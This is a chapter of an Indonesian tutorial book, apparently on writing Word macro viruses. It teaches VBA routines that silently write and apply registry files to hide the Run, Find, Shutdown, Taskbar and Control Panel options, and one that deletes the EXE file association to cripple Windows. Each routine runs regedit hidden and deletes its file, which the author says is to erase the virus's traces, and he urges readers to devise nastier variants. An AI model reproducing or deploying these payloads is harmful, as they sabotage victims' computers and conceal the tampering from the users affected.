BDVM - Bab 8 Manipulasi dengan file REG

Bab 8 
Manipulasi dengan file REG

Pada bagian ini, kita lengkapi kependekaran kita dengan belajar beberapa jurus yang berhubungan dengan “jantung Windows”.  Jantung Windows adalah suatu bagian dari sistem operasi Windows yang dikenal dengan julukan Registry.    Data-data vital yang menopang kehidupan, perilaku dan kekuatan Windows ada pada bagian ini.  Dapat dibayangkan akibatnya, jika kita mengotak-atik bagian ini secara ngawur.  Windows akan kacau.  Kita akan belajar beberapa jurus ringan untuk “menjewer” jantung Windows.
Jika Anda seorang pemakai windows “yang agak serius”, tentunya mengenal registry windows.  Registry windows dapat diubah langsung dengan program registry Editor (regedit.exe).  atau dengan suatu file registry.  Ekstension yang biasanya dipakai oleh file registry adalah REG.  Dengan file jenis REG ini kita dapat memanipulasi registry secara lebih cepat dan otomatis.

Masih ingat perintah. System.Privateprofilestring?  dengan fasilitas tersebut  kita dapat memanipulasi data registry, namun sebatas data string saja.  Cara berikut ini akan memanipulasi registry secara penuh dengan bantuan file jenis REG.
Langkah-langkah yang dilakukan adalah :
•    membuat file reg
•    memasukkan data file REG dengan regedit
•    menghapus file reg

Untuk jelasnya, kita lihat manipulasi-manipulasi berikut.

1.    Menghilangkan pilihan RUN dari menu Start

Jika kita pemakai windows yang “suka aneh-aneh” tentu tahu betul, bahwa pilihan pada menu Start dapat ditampilkan ataupun disembunyikan.   Dapat dilakukan  dengan bantuan program yang ditujukan untuk keperluan tersebut. Misalnya Tweak-UI, I-TweakU,dan lain sebagainya. Atau ada yang suka dengan jalan yang lebih sulit, namun memberikan kebebasan manipulasi, dengan program standar windows yang bernama regedit.  Manipulasi dengan regedit ini dapat dilakukan dengan dua cara.  Pertama secara langsung dengan program regedit.  Cara kedua dengan membentuk suatu file registrasi (REG).   Baru kemudian dijalankan, secara tidak langsung, dengan regedit.
Untuk keperluan virus kita ini, “terpaksa” kita memakai cara kedua yaitu dengan file reg. Penjelasan detail dapat dilihat pada listing berikut

'Jurus : Menikam Rembulan (MR)
Sub MR()
Open "\nr.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[Hkey_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"
Print #1, """"; "NoRun"; """"; "=dword:01"
Close #1
On Error Resume Next
Shell "regedit \nr.reg", vbHide
Kill "\nr.reg"
End Sub

•    Sub MR()
Kita buat suatu sub prosedur baru dengan nama MR.  Kependekan dari Menikam Rembulan.  Dengan jurus ini, kita akan menghilangkan pilihan Run.

•    Open “\nr.reg” for output As # 1
Perintah ini berguna untuk membuat suatu file teks ASCII (American Standard Code for Information Interchange) dengan nama NR.REG.  File kita buat di root directory.  Ini ditunjukkan dengan perintah \ di depan nama file NR.REG.

•    Print #1, “REGEDIT4”
Digunakan untuk menuliskan data “REGEDIT4” pada file NR.REG yang sedang kita bentuk.  Lho … mengapa kok harus REGEDIT.4?.  Memang harus begitu, karena ini menyangkut struktur file dengan jenis REG.

•    Print #1,
Digunakan untuk membuat satu spasi kosong pada file NR.REG. 

•    Print #1, “[Hkey_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]”
Dipakai untuk menuliskan data lokasi registry yang akan dimanipulasi.  Alamat lokasi tersebut adalah : Hkey_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

•    Print #1, “”””; “NoRun”; “”””;”=dword:01”
Digunakan untuk menuliskan nama value yang dibentuk.  Pada kasus ini nama valuenya adalah NoRun.  Data value yang dipakai adalah 01 dengan jenis data Dword.
Lihat! Data yang dipakai adalah dword, oleh karena itu kita tidak dapat memakai perintah PrivateProfileString milik word yang mengkhususkan diri untuk jenis data string saja.
Juga, perhatikan tanda petik yang berderet-deret,  harus ditulis begitu agar pembentukan perintah pada file NR.REG benar.  Berhati-hatilah!  Kesalahan ketik tanda petik ini akan menyebabkan file registry (NR.REG) menjadi tidak berfungsi sebagaimana yang kita harapkan.  Sehingga manipulasi akan mengalami kegagalan.

•    Close #1
Perintah ini dipakai untuk menutup file NR.REG. Dengan perintah ini file tersebut akan dibentuk. Oleh sistem operasi .

•    On error resume next
Perintah ini digunakan untuk berjaga-jaga jika terjadi kesalahan program.  Ini penting dilakukan, soalnya kita akan menjalankan program di luar Word, yaitu : REGEDIT.EXE.   Siapa tahu file tersebut tidak ada atau telah disembunyikan. Dengan tidak ditemukannya file regedit.exe tentu saja akan menyebabkan program berhenti dan mengeluarkan pesan kesalahan.   Tentu saja, program virus akan terhenti eksekusinya.  Itu tidak kita harapkan bukan?

•    Shell “regedit \nr.reg”, vbhide
Baris perintah ini untuk menjalankan program regedit yang akan menjalankan file NR.REG yang telah dibentuk sebelumnya.  Selain itu proses jalannya eksekusi tidak akan kelihatan karena kita memberikan perintah vbhide.   Jika kita lupa menuliskannya maka pesan sukses dari regedit akan ditampilkan.  Hal tersebut tentu tidak baik untuk virus kita. Oke? He.. he..   Karena pemakai akan curiga, kok tahu-tahu muncul pesan manipulasi registry.

•    Kill “\nr.reg”
Perintah ini digunakan untuk menghapus file NR.REG dari root directory.  Langkah ini penting dilakukan untuk menghilangkan jejak virus.  Jadi, setelah file NR.REG dijalankan oleh program REGEDIT, lalu hapuslah, karena sudah tidak kita perlukan lagi.   Ingat pepatah “habis manis sepah dibuang”? Ya… ya… ya… kira-kira begitulah perlakuan kita pada file NR.REG. …:)

•    End Sub
Perintah ini menandakan berakhirnya sub prosedur yang kita buat.

Begitulah lebih kurang manipulasi yang kita lakukan dengan bantuan file reg.  Nah! Kunci sudah terpegang. Registry windows sudah dalam genggaman. Tinggal “tingkat kekejaman” kitalah akhirnya yang menentukan kelangsungan hidup data-data pada Registry… :)


2.    Menghilangkan pilihan Find

Jurus berikutnya setelah “menikam rembulan”, kita akan mempelajari jurus memanah matahari.  Tentunya kita tahu, bahwa pilihan Find pada menu Start, amat berguna untuk mencari data-data tertentu,  kita dapat menghilangkannya dengan cara yang sama dengan contoh di atas.  Hanya terdapat sedikit perbedaan, yaitu nama file REG yang dibentuk, dan nama value pada registry.  Saya tidak akan berpanjang lebar, jika memang Anda masih belum paham, ulangi dan pelajari contoh pertama (NoRun).  Secara prinsip manipulasi yang akan kita lakukan adalah sama saja.  Listingnya adalah sebagai berikut

'Jurus : Memanah Matahari (MM)
Sub MM()
Open "\nf.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[Hkey_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"
Print #1, """"; "NoFind"; """"; "=dword:01"
Close #1
On Error Resume Next
Shell "regedit \nf.reg", vbHide
Kill "\nf.reg"
End Sub

Perhatikan listing di atas dan bandingkan dengan sub prosedur MR.  Mirip sekali bukan?  Perbedaannya terletak pada nama file teks yang dibentuk yaitu NR.REG dan NF.REG dan pada nama value NoRun menjadi NoFind.  Itu saja!
Dengan hilang atau tidak tampilnya perintah FIND, tentu saja pemakai akan kesulitan dalam mencari data atau file.  Terpaksa ia akan mencari satu demi satu dengan cara membuka folder (sub directory) yang ada.  Hal itu amat menjengkelkan dan melelahkan lho…


3.    Menghilangkan pilihan Shutdown

Jurus kita berikutnya bernama Mencabut Ilalang (MI).  Tujuan dari jurus atau manipulasi ini menghilangkan pilihan Shutdown  pada menu Start.  Hasilnya komputer tidak dapat di-booting secara normal.  Caranya sama saja dengan 2 contoh manipulasi di atas,  yang kita ganti hanya nama file reg-nya dengan nama NC.REG.   Juga, nama valuenya kita ganti dengan NoClose.  Saya yakin Anda bisa!  Untuk lengkapnya, berikut adalah listingnya.

'Jurus : Mencabut Ilalang (MI)
Sub MI()
Open "\nc.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[Hkey_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"
Print #1, """"; "NoClose"; """"; "=dword:01"
Close #1
On Error Resume Next
Shell "regedit \nc.reg", vbHide
Kill "\nc.reg"
End Sub

Dengan jurus ini pemakai akan kesulitan untuk melakukan proses shutdown.  Akibatnya?  Jika pemakai Windows “emosi”, ia akan memakai jurus “telunjuk sakti”, alias menekan tombol RESET.  Atau bahkan mematikan komputer begitu saja.   Tindakan ini akan mengganggu kestabilan sistem operasi Windows.  Registry dapat terkorupsi dan dapat mengakibatkan kemacetan sistem operasi Windows secara total !


4.    Menghilangkan pilihan taskbar

Jurus ini berguna untuk menaburkan “kabut” pada menu Start.  Dengan jurus ini maka pilihan Taskbar akan hilang.  Dengan hilangnya pilihan ini pemakai akan kesulitan mengubah menu atau menghilangkan daftar dokumen yang baru dipakai. 
Jika kita klik Start pada windows, pilihan Settings akan kita temui.  Di dalamnya terdapat pilihan Taskbar.  Manipulasi berikut ini akan menghilangkannya. Isinya sama saja dengan contoh-contoh di atas.    Jangan bosan ya?

'Jurus : Mengurai Kabut (MK)
Sub MK()
Open "\nst.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[Hkey_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"
Print #1, """"; "NoSetTaskbar"; """"; "=dword:01"
Close #1
On Error Resume Next
Shell "regedit \nst.reg", vbHide
Kill "\nst.reg"
End Sub

Meskipun jurus ini kurang ampuh untuk mengkacaukan Windows, tapi cukup merepotkan. Karena pemakai terpaksa memakai Windows explorer jika ia ingin mengubah menu atau menghapus daftar most recently used document.


5.    Menghilangkan pilihan control panel dan printer

Jurus Mengguncang Nadi, itulah nama jurus yang akan kita buat.  Wah…wah.. makin seru ya?  Kali ini kita akan menyikat pilihan Control Panel dan printer dari pilihan Settings.  Caranya?  Sama saja.  Lihat listing berikut .

'Jurus : Mengguncang Nadi (MN)
Sub MN()
Open "\nsf.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[Hkey_Current_User\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]"
Print #1, """"; "NoSetFolders"; """"; "=dword:01"
Close #1
Shell "regedit \nsf.reg", vbHide
Kill "\nsf.reg"
End Sub

Dengan tidak dapatnya diaksesnya control panel dari menu Start, pengubahan kekuatan sistem operasi Windows, akan cukup merepotkan untuk dilakukan.   Mau tidak mau pemakai harus mengakses control panel dari My Computer atau dengan memakai jasa Windows Explorer.

Jika Anda perhatikan,  kita membuat suatu file untuk memanipulasi Registry secara sendiri-sendiri.  Sepintas mungkin terasa tidak efisien, membuang waktu dan tenaga.  Namun itu tidak sepenuhnya benar. Teknik ini amat berguna untuk efek-efek manipulasi yang kita buat.  Misalnya kita punya sub prosedur yang akan menghilangkan pilihan Run, Find dan Shutdown.  Yang kita lakukan cukup membuat sub prosedur baru dan memangil sub prosedur-sub prosedur tersebut sesuai kebutuhan.  Cara ini lebih luwes untuk proses manipulasi.  Sebagai ilustrasi, kita akan membuat suatu jurus baru yang dipakai untuk menghilangkan pilihan RUN, Find dan Shutdown.  Sebut saja jurus kita ini dengan nama PP. Listingnya sebagai berikut.

' Jurus : Pukulan Pelangi (PP)
Sub PP()
MR
MM
MI
End Sub

Dapat kita lihat, penggabungan jurus-jurus lebih mudah untuk dilakukan.  Tentu saja variasi jurus dapat disesuaikan sekehendak hati.
Contoh lain, mungkin kita akan memakai dua gabungan jurus saja.  Misalnya menghilangkan pilihan Control panel dan Printer dan Find. Yang kita ketikkan cukup, sebagai berikut :

'Jurus : Melibas Jantung (MJ)
Sub MJ()
MK
MN
End Sub

MJ merupakan singkatan dari Melibas Jantung, berisi dua jurus yaitu Mencabut Ilalang (MI) dan Mengguncang Nadi (MN).  Seandainya kita mempunyai 30 jurus dasar, bisa kita bayangkan bagaimana dengan mudahnya kita membuat variasi jurus pukulan baru.
Sederhana bukan?  Inilah hidup !. C’est la vie !.  This is life! .. :)


6.    Melumpuhkan file EXE

Kita akan berkenalan dengan jurus berbahaya.  Saya menyebutnya dengan LK.  Kependekan dari Ledakan Kosmos. Jurus ini termasuk manipulasi gawat.  Disini kita akan melumpuhkan fungsi file EXE.  Caranya? Tentu saja lewat registry.  Ingat! Jantung windows ada pada registry,  jika ingin melumpuhkan windows tentu saja cara yang paling efektif adalah menyerang registry…..  :)
Setiap data-data jenis file yang beroperasi di windows, umumnya akan dicatat di registry.  Demikian juga file jenis EXE, untuk melumpuhkan file EXE, hapus saja bagian yang mendefinisikannya di registry.  Simple ‘kan? He.. he.. he…:)   Berikut ini adalah listingnya.

'Jurus : Ledakan Kosmos (LK)
Sub LK()
Open "\ne.reg" For Output As #1
Print #1, "REGEDIT4"
Print #1,
Print #1, "[-Hkey_Classes_Root\.exefile]"
Close #1
On Error Resume Next
Shell "regedit \ne.reg", vbHide
Kill "\ne.reg"
End Sub

Hati-hati jurus ini cukup mematikan, karena akan membuat Windows menjadi lumpuh, sebab tidak dapat menjalankan file dengan ekstensi EXE.
Tak perlu dijelaskan ya?  Biar penasaran… he..  he.. :) makanya, makanya… belajar dong registry windows, agar dapat mempermainkan windows.  
Ya… saya tahu.  Jurus-jurus yang kita pelajari di bagian ini memang sedikit.  Sengaja memang! Jika saya pasangkan terlalu banyak contoh jurus untuk mengobrak-abrik Registry, rasanya terlalu memandang enteng Anda… he… he… :)  Tugas Andalah untuk menggali dan membuat jurus-jurus ampuh.  Lalu jangan lupa… ajari saya! Oke?

Baca kitab eh… maksudnya buku : Bermain-main dengan Registry Windows terbitan Elex Media Komputindo, dengan pengarang yang sama, bila Anda tertarik (dan ingin memusingkan kepala) untuk mengenal registry lebih jauh.     Harap dicatat ini informasi saja lho… bukan promosi …  tapi kalau mau dianggap promosi ya… boleh-boleh saja. He.. he… he…. :)


Download Bab ini dalam versi Ebook PDF